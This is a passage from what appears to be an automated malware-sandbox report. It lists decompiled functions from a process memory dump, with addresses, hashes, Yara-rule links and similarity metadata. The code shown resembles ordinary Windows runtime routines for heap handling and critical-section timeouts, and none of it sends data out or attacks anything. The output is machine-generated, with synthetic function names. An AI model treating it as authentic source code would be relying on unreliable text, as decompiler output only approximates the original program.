				} else {
					return E02B10050(_t14);
				}
			}










                        0x02b0ff66
                        0x02b0ff6b
                        0x00000000
                        0x02b0ff8f
                        0x00000000
                        0x02b0ff8f

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 395dc550d23ff52c87e5b6fb6f1ce5f43f61cb9d787c7b60ebc1c842e44c6487
                        • Instruction ID: d09f5444e603f1053418d97d1d740e29a6120714f576503e225484b55b9418e1
                        • Opcode Fuzzy Hash: 395dc550d23ff52c87e5b6fb6f1ce5f43f61cb9d787c7b60ebc1c842e44c6487
                        • Instruction Fuzzy Hash: 70E09AB030E2049FD736DB51D1A0F353B98DB42721F1984DDE4084B981CF61E881C606
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02BAD380, Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02BAD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L02AFE8B0(__ecx, _a4, 0xfff);
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                        0x02bad38a
                        0x02bad39b
                        0x02bad3b1
                        0x00000000
                        0x02bad3b6
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction ID: 711814755eb845207e476b3d8987b32a80a63f6636de14d1455117acf7061068
                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction Fuzzy Hash: A7E0C231284205BBDB226E44CD10FA9BB57DF407A0F108071FE085BBA0CA759C91EAC4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B841E8, Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E02B841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x2bd08f0);
				_t5 = E02B4D08C(__ebx, __edi, __esi);
				if( *0x2be87ec == 0) {
					E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x2be87ec == 0) {
						 *0x2be87f0 = 0x2be87ec;
						 *0x2be87ec = 0x2be87ec;
						 *0x2be87e8 = 0x2be87e4;
						 *0x2be87e4 = 0x2be87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L02B84248();
				}
				return E02B4D0D1(_t5);
			}





                        0x02b841e8
                        0x02b841ea
                        0x02b841ef
                        0x02b841fb
                        0x02b84206
                        0x02b8420b
                        0x02b84216
                        0x02b8421d
                        0x02b84222
                        0x02b8422c
                        0x02b84231
                        0x02b84231
                        0x02b84236
                        0x02b8423d
                        0x02b8423d
                        0x02b84247

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a6dcb4d3a0bbbd848b9308fb7b32bf11c12d9e27ccb7f7a7957560a9f0580db6
                        • Instruction ID: 7b1b81b3f7973ab0403bab848ecc7d06ba26e2d5e64f7759c5beaac66a01295a
                        • Opcode Fuzzy Hash: a6dcb4d3a0bbbd848b9308fb7b32bf11c12d9e27ccb7f7a7957560a9f0580db6
                        • Instruction Fuzzy Hash: C1F03279DA1B01CFDFA0EFA8D6027083AB5F7443A0F0049AED0498B2A4DB34A494DF03
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2A185, Relevance: .0, Instructions: 20COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B2A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x2be67e4 >= 0xa) {
					if(_t5 < 0x2be6800 || _t5 >= 0x2be6900) {
						return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E02B10010(0x2be67e0, _t5);
				}
			}





                        0x02b2a190
                        0x02b2a1a6
                        0x02b2a1c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b2a192
                        0x02b2a192
                        0x02b2a19f
                        0x02b2a19f

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bacd6940e143bf84cfb9a338dea2a75c432debb4cb22c37f1ab85e90b70dc75
                        • Instruction ID: 7ef71122857b97d3b50867c8eed50efb8648cb997aa59b283caaaa248631e8a7
                        • Opcode Fuzzy Hash: 9bacd6940e143bf84cfb9a338dea2a75c432debb4cb22c37f1ab85e90b70dc75
                        • Instruction Fuzzy Hash: E2D02E326601209ACF2D7B008C58B22231BEBA8B21F300CCDF20B0B9A0DF60C8E8D509
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B216E0, Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B216E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E02B21710(0x2be67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L02B14620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                        0x02b216e8
                        0x02b216ef
                        0x02b216f3
                        0x02b216fe
                        0x00000000
                        0x02b21700
                        0x02b2170d
                        0x02b2170d
                        0x02b216f2
                        0x02b216f2
                        0x02b216f2
                        0x02b216f2

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7a4576458357286551d25ad8bb444f5af86349c6de12d02092cedce1654f29a
                        • Instruction ID: 048674a50b83900dba92ca5008181b72ee0a04c2ef14871ed71fec4a4bac9622
                        • Opcode Fuzzy Hash: e7a4576458357286551d25ad8bb444f5af86349c6de12d02092cedce1654f29a
                        • Instruction Fuzzy Hash: F6D0A77111030052DE2E5F189804B193257DBC0789F3800DCF10F594D2CFB4CC96E448
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B753CA, Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B753CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E02B0EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                        0x02b753ca
                        0x02b753ce
                        0x02b753d9
                        0x02b753de
                        0x02b753e1
                        0x02b753e1
                        0x02b753e6
                        0x02b753f3
                        0x00000000
                        0x02b753f8
                        0x02b753fb

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction ID: 63c252997067ed78383736df9aecfbcfaa3f22c84e05e77283350bf3f3b77fad
                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction Fuzzy Hash: E6E0EC719446849FCF23EB59CA90F5EB7F6FB44B40F554494A4196B671C764ED00CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B0AAB0, Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B0AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                        0x02b0aab6
                        0x02b0aabb
                        0x02b5a442
                        0x00000000
                        0x02b5a448
                        0x02b5a454
                        0x02b5a454
                        0x02b0aac1
                        0x02b0aac1
                        0x02b0aac6
                        0x02b0aac6

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction ID: 54c507718502ab970dadfc6b89d92450e52720d60fe8c0c11ce3764dabbae46f
                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction Fuzzy Hash: BAD0E935352A90CFD617DB5DC594B1577A4FB44B84FC509D0E901CB762E72CD984CA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B235A1, Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B235A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E02B0EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                        0x02b235a1
                        0x02b235a1
                        0x02b235a5
                        0x02b235ab
                        0x02b235ab
                        0x02b235b5
                        0x00000000
                        0x02b235c1
                        0x02b235b7

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction ID: 45cc7dfc014045e9dd69f7af1cf6fd63b31b301676244e2de48ca428263eefc7
                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction Fuzzy Hash: 27D0C9315513949ADB52AB60C25876877FBFB00218F5824E5944E1699FC33E8A5EDA01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFDB40, Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02AFDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L02B14620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                        0x02afdb4d
                        0x02afdb54
                        0x02afdb5f
                        0x02afdb56
                        0x02afdb56
                        0x02afdb5c
                        0x02afdb5c

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction ID: 1fba16aef53ad68194827946538445d9e8b75b5b638d7a71b7c048d7ab3d9930
                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction Fuzzy Hash: 3EC08C70280A00AAEB221F20CD01F0036A2BB00B09F8404E07300DB0F0DB7CD801EA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B7A537, Relevance: .0, Instructions: 11COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B7A537(intOrPtr _a4, intOrPtr _a8) {

				return L02B18E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                        0x02b7a553

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction ID: 468e30f0d1ecdefa8fefee41761b20ec45e58044ea5c10b362df48c2a741d75e
                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction Fuzzy Hash: 40C01233180248BBCB126E81CC00F067F2AFB94B60F008010BA080A5608632E970EA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B13A1C, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B13A1C(intOrPtr _a4) {
				void* _t5;

				return L02B14620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                        0x02b13a35

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction ID: d885ee42709046f2247471e7bed2a237f23a361db5ddeb1e99ccd1a9b180fc1c
                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction Fuzzy Hash: 83C08C32080248BBC7126E41DC00F017B2AE790B60F000060B6040A5608532EC60D988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B076E2, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B076E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                        0x02b076e4
                        0x00000000
                        0x02b076f8
                        0x02b076fd

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction ID: fc68c59f7b27469b0d05f967ba4654f96649a0097cdad0fe34e17cb02c92d05d
                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction Fuzzy Hash: 32C08C702411805AEB2B5748CE60B20FA50EF08708F8801DCAA020A4E1CB68B802E688
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B236CC, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B236CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                        0x02b236d2
                        0x02b236e8
                        0x02b236d4
                        0x02b236e5
                        0x02b236e5

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction ID: de8b7339be51081a0cc406cdd04f486e9c4562f5ab57590e5ef54897ff9801cf
                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction Fuzzy Hash: BCC02BF0154440BBD7161F30CD00F1472A9F700B21FA403D47220454F0D63C9C00D500
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFAD30, Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02AFAD30(intOrPtr _a4) {

				return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                        0x02afad49

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction ID: 19d8e3d323321daa3673549369b207a656d952a7a0d8b3c5a4af69fc218a388f
                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction Fuzzy Hash: 02C08C32080248BBC7126B45CD00F01BB2AEB90B60F000020B6040B6618A32E860E988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B17D50, Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B17D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                        0x02b17d56
                        0x02b17d5b
                        0x02b17d60
                        0x02b17d5d
                        0x02b17d5d
                        0x02b17d5d

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction ID: 11337aa7e043d3914132e658bbc40de2da5d97849f766f83cd9f3e7dc6cd7ea9
                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction Fuzzy Hash: 3EB092343019408FCE16DF18C080B1573F4FB49A40B8440D0E400CBA20D729E8009900
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B22ACB, Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02B22ACB() {
				void* _t5;

				return E02B0EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                        0x02b22adc

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction ID: f553b3d0b0456a98252166fc922354e31641f7068f7ef4d5905b9aec8d0e0fe9
                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction Fuzzy Hash: F1B092328104408BCF02AB40C690A197772AB00750F0588909001279608228AC01CA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B8FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E02B8FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E02B3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E02B85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E02B85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                        0x02b8fdda
                        0x02b8fde2
                        0x02b8fde5
                        0x02b8fdec
                        0x02b8fdfa
                        0x02b8fdff
                        0x02b8fe0a
                        0x02b8fe0f
                        0x02b8fe17
                        0x02b8fe1e
                        0x02b8fe19
                        0x02b8fe19
                        0x02b8fe19
                        0x02b8fe20
                        0x02b8fe21
                        0x02b8fe22
                        0x02b8fe25
                        0x02b8fe40

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B8FDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02B8FE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02B8FE01
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: f5640d7be6ced0dc57c23b5dbcaedefdc734118ee43052ca5f4097b71d0db982
                        • Instruction ID: 46f05603a296ffe4847ad895bd20643436fe3580cad55f0907ef3b3a57b73b28
                        • Opcode Fuzzy Hash: f5640d7be6ced0dc57c23b5dbcaedefdc734118ee43052ca5f4097b71d0db982
                        • Instruction Fuzzy Hash: 40F0C236200201BBEA302A55DC02F23BB5BEB84731F154255F62D565D1DA62B860C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%